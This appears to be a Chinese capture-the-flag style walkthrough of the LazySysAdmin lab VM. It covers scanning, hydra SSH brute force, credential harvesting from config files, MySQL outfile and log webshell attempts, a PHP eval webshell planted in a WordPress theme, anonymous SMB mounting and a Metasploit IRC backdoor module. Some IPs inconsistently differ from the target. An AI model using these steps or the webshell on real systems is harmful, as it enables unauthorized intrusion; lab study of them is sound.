靶机渗透(三)——Lazysysadmin

环境配置
都是在vmware中
靶机：未知，nat模式
kali：192.168.92.5 nat，模式

信息收集

arp-scan -l

扫描局域网内所有的ip

从上图可知，靶机的ip是192.168.92.6

端口扫描

nmap -sS -Pn -T4 -sV -O 192.168.92.6
或者
masscan 192.168.92.6 -p 0-65535 --rate=10000

• masscan扫描速度快，但准确率不高，多扫描几次，防止漏扫

• namp：-T4（分为0-5等级；-sV（版本信息与开启服务）；-A（详细扫描开放的端口的具体服务）

• 与masscan相比，namp更详细，但是速度较慢（可以先使用masscan扫描出端口，再用nmap详细扫描开放的端口)

---

• 6667（ircd 互联网中继聊天守护进程），6667为默认的IRC服务器端口，msf直接可以过

• 22（ssh服务），ssh弱口令尝试

• 139、445（smaba共享服务），一般攻击方向为爆破、未授权访问、远程代码执行

• 80（Apache服务）

• 3306（MySQL）端口

目录扫描

扫描到了很多目录，不过在前几行，我们可以发现这是个wordpress博客网站，甚至我还搭建过

在info.php中可以看到网站的很多配置信息

查看防爬虫机器人文件


此文件中的路径，是不会被爬虫机器人爬虫的（证明此中路径或许隐藏重要信息）

遗憾的是，并未从这些路径获取到有用信息

web爆破

尝试登录192.168.92.6/wordpress

秀儿，togie已经成功的引起我的注意

ssh爆破

hydra -l togie -P /usr/share/wordlists/passwodtop500.txt -vV -t4 192.168.92.6 ssh

用户名：togie 密码：12345

远程登录靶机

ssh togie@192.168.92.6

查看权限

发现不是root权限，我尝试登录root时（sudo su）
输入密码12345，竟然直接进来了

接下来，不能白来，留点礼物

必须是在/var/www/html目录下,否则连接不上

根据扫描到的目录，从两个地方着重看一下
1、wordpress登陆界面
2、phpmyadmin登陆界面

phpmyadmin爆破

默认的phpmyadmin配置文件位于phpmyadmin文件夹下，一般以下两个都是：

phpmyadmin/libraries/config.default.php
./config.inc.php

root@LazySysAdmin:/usr/share/phpmyadmin/libraries# cat config.default.php 

查看config.default.php配置文件：只有用户名没有密码。

在/etc/phpmyadmin/config-db.php配置文件中找到了密码

用户名：phpmyadmin
密码：TogieMYSQL12345

但是登录不上

在/var/www/html/wordpress/wp-config.php找到了数据库密码

账号：Admin
密码：TogieMYSQL12345^^

虽然登录成功，但是权限低，查询不了数据

用root TogieMYSQL12345这个也可以登录，权限是管理员

phpmyadmin挂马的两种方式：
1、利用into outfile写文件挂马

show variables like “%secure%”;
查看 MySQL 自定义的输出路径

已经指定了路径，那就先尝试一下向指定路径写马：

select "" into outfile "/var/lib/mysql-files/test0.php"

写入成功，浏览器查看并没有被解析

2、利用日志文件挂马
查看全局日志情况：show variables like “%general%”
不仅关闭，还限制了路径

开启日志记录：
set global general_log = on

设置日志路径为网站根目录:
set global general_log_file = “/var/www/html”

失败

将下面这个密码尝试登录到管理员页面

账号：Admin
密码：TogieMYSQL12345^^

在主题编辑的地方找到一个php文件：
echo “123”;

@eval($_POST['abc']);

139 445端口（SMB）

SMB协议用于实现局域网的文件和打印机共享，Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件，由服务器及客户端程序构成。

常见的用于实现该共享功能的开放端口是139和445端口，一般连接会要求用户密码，但某些时候也会允许无密码连接。

本次就利用samba配置不当，导致无密码连接时泄漏重要文件，来进行渗透。

打开新终端

enum4linux -S 192.168.92.6

又发现允许无账号密码连接：

在连接目标主机的SMB文件共享服务时，有两种方式：

1、资源管理器连接
2、命令行连接

1、资源管理器连接：

1、Windows下，打开我的电脑，在地址栏输入 192.168.56.103，提示输入账号密码，即可。

2、Linux下，在资源管理器下的网络服务中，输入smb://192.168.56.103 即可。

1、远程网络挂载：

找到共享路径

使用网络远程挂载

mount -t cifs -o username=' ',password=' ' //192.168.110.153/share$ /media

cd /media
ls
cat deets.txt

发现初始备用密码：12345

6667端口，ircd

1.启动msf终端

msfconsole

2.搜素模块

search unreal_ircd_3281_backdoor

利用模块

use exploit/unix/irc/unreal_ircd_3281_backdoor

查看参数

show options

设置ip

set rhost 192.168.92.6

执行

exploit

失败了